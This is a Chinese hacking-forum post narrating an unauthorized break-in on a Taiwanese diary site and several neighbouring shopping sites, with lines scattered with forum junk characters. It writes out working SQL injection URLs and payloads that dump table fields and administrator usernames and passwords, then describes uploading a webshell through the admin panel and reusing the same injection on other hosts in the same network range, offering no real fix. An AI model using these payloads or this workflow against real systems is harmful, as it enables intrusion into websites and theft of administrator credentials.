发现一个注入点
1 Q& x) y8 S% I" Shttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
, ?( \' i6 Y! j& X+ E* V) F H: E+ b! u% e% y
习惯性的加’having1=1--- L. h; U9 V3 Q* |
! ?2 n8 }# O$ l: P% Whttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—& I& D; {) ^4 d7 A8 |0 [
0 l! Y" t9 k9 z3 W4 R5 r* s6 b& Q09 z- \4 o5 e4 T
& A7 y) {2 a1 u; t& N2 h爆出Diary_A.dl_Title(这时候很激动啊)! E( f+ e8 V$ I$ s. z
" N4 r& p4 I/ |% M0 V0 W
那么继续2 s2 _% P: \, ?
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
$ j- z% a M9 i7 s# ~, T
/ u' r+ ^2 g* v% m0 j7 S继续,一直爆下去
6 d/ A w. f" d6 ~; i
6 `0 U. y4 b$ n$ r爆到几个字段和表段 但是没找到需要的管理用户的字段- G3 c5 Z! G& G/ L8 {
7 f% ?: N$ d0 P; }" O- [: J2 v, l
蛋疼了 怎么办 然后去后台登陆页看源码9 E2 U7 M# i* _+ y' g8 X' E
" F, a4 `( Q( p5 M3 U/ Z
0" g4 J, `' f! s
- y- N2 ^. I, N% WInput name= “ADUID”( K4 a' S* T0 } R) t7 Z
Input name= “ADPWD”7 [9 y& f5 ~9 v7 j. z" c
; a U" L* @) W4 ?很幸运 找到了字段那就继续
p1 ^$ i, ~2 M+ ^$ e2 q) [/ \找到之后开始爆用户
) O: l" e& j/ O( ~& {( p4 Mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—! n @+ V k: ~6 S% a4 H
爆密码
$ D- L. i) k2 |http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
& W* a' l. W/ M, q" h7 j测试了下 这个注入点只能爆到文章哪里的表
% s* C4 b5 A8 {. k
9 C& L- ^3 \ p1 U& z头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了+ P& s' R6 i8 g* @
: E# E. F8 ^" f( s: R又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了/ e3 k6 |5 @/ ?1 M& b2 @$ X) \' z
, c$ N# I% V6 t* ] @
473
4 X% |" S Y' {2 |/ W. ?* V; Z
: t, ?* W- x2 _) l3 m进后台' n6 v8 }5 {5 {% W7 T1 c( K) T
. v8 b7 M& S, H b; M0 Z, N
" Q. l* W0 P; D) N, m# l; t发现几个上传点 有的地方不能上传 而且防止恶意代码
2 h! g7 x- A0 J5 _7 v+ P
% E! l" e3 d T没办法 各种百度各种找大牛 找到一只好像可以突破的马: T. V7 w R3 i. _& w2 n+ J Q
5 k" _) m6 k; W' ]- `5 o9 J
6 ~' f$ C: x, X在系统管理那里直接上传 不过没有显示地址; |$ _8 S3 M2 G# r; S' T) R3 S8 L
9 G n4 @. y$ t- X! |' F6 U
再上传一次 抓包 搞定OK/ x% j+ K5 k3 k* W/ v
* W. h; W+ S1 E) N/ x! Z' V
7 v; G& F: o! o, Z+ Y& `1 E: s5 ^6 Y/ V+ r z' R# Y
472
; o/ M4 N2 q5 x2 @( e, I7 g# x# F6 V' o0 Q) w
晚上不行了 去睡觉。。。
* ]+ o6 ?- S7 T0 o6 J, Y第二天刚起床 闲的没事做继续日站吧 % ~& F: b$ X- A8 Y9 v9 F6 X
; O4 q8 O! R4 {找个站 就把这个站的旁c扫了下& y4 o5 G6 W0 z
: q* o+ L e9 M4 u. Y6 ^
发现c段也有一个购物站 ,然后还和这个站的模板差不多
' G8 g+ q0 y- G, g, R7 K
4 Y* e# S1 d: b9 y' }就找到会员登录口测试8 Y: X" Y6 Y7 |2 S0 ]! J3 }% D
2 W( I. u) {$ C0 H" s& w+ x
'and (select top 1 MGR_UID from A_MGR)>0—
( w- z: I3 \; U/ C果断爆到了 这时候我很激动 通杀
7 s/ `, O2 {/ O: ~2 _( G5 [* n, \0 j% Z6 @0 k( {
再次翻c段
, ~$ E, ?! d: ], J/ T3 ]2 `4 i" \% h h
翻出几个站 都成功拿下
" z- h. N+ ]# W/ I# J" x4 f7 k( k7 Y y: b
- ]8 W. ]9 N6 l x! ]3 ^
7 v j. ]8 }' s, p修复方案:8 V* [7 \7 y# s) e/ T8 W' p+ D
他们比我专业
- h' L8 X3 n) ?% ?
" @. I0 Y3 l! k; R$ O; n q- D- @4 A4 d( Y
4 s) w' t4 S$ G4 J& B$ e
|
发表于 2013-4-4 17:40:38
收藏
支持
反对